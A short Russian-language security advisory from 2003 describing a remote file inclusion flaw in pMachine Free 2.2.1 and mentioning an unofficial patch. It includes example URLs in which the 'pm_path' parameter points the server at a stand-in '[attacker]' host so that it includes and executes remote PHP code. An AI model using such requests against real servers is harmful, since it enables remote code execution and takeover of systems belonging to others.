Security Lab

Удаленное выполнение произвольного PHP кода в pMachine

Дата публикации:18.06.2003
Всего просмотров:1881
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: Уязвимость включения файла обнаружена в системе управления содержанием pMachine. Удаленный пользователь может выполнить произвольные команды на целевой системе.

Сообщается, что недостаток в сценарии 'pm/inc.lib.php' позволяет удаленному пользователю определить удаленное местоположение для переменной $pm_path, чтобы заставить сервер включить файл в удаленном местоположении. PHP код в файле, Включая команды операционной системы, будут выполнены на целевом сервере с привилегиями целевого Web сервера. Пример:

http://[target]/pm/lib.inc.php?pm_path=htt p://[attacker]/&sfx=.txt
with:
http://[attacker]/config.txt

http://[target]/pm/lib.inc.php?pm_path=http://[attacker]/&sfx=/badcode.txt
with:
http://[attacker]/conf ig/badcode.txt
Уязвимость обнаружена в pMachine Free 2.2.1

Неофициальный патч опубликован на сайте http://www.phpsecure.info

 

Ссылки: pMachine (PHP) : Include() Security Hole